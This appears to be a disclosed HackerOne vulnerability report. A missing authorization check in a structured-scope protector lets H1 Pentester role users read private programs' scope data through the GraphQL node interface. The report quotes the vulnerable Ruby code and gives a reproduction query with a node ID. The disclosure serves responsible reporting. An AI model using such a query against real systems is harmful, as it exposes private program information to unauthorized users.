HackerOne Pentesters can access any structured scope object through GraphQL node interface

A missing authorization check in the `StructuredScope` protector class (`app/protectors/protected_structured_scope.rb:42`) enables any HackerOne Pentester to access structured scope objects of programs they aren't invited to or aren't running a penetration test through HackerOne. ```ruby class ProtectedStructuredScope # ... property(:CAN_INVITE_HACKERS) do StructuredScope.unscoped .joins(:team) .merge(Team.that_can_invite_hackers) end group( # ... (has_role(H1_PENTESTER) & has_feature(CAN_INVITE_HACKERS)), ) do allow :id allow :asset_identifier allow :asset_type allow :eligible_for_bounty allow :eligible_for_submission allow :instruction allow :rendered_instruction allow :availability_requirement allow :confidentiality_requirement allow :integrity_requirement allow :max_severity allow :archived_at allow :updated_at # ... end ``` The `H1_PENTESTER` role is defined as: ```ruby scope :user_is_hackerone_pentester, ->(user) do verified.where( User.where(id: user).where.not(id: nil).where(User.arel_table[:h1_pentester].eq(true)).select(1).arel.exists, ) end ``` The authorization logic should contain a check that determines whether the user has access to the structured scope through the `Pentest` object. To reproduce, the following GraphQL query can be used: ``` query { node(id: "Z2lkOi8vaGFja2Vyb25lL1N0cnVjdHVyZWRTY29wZS8x") { ... on StructuredScope { _id asset_identifier asset_type } } } ``` Replace the node ID with any structured scope that belongs to a private program and it'll expose the attributes included in the protector. ## Impact HackerOne Pentesters, although having more access than normal users, can obtain information from private programs that they don't have access to and aren't doing a penetration test through HackerOne.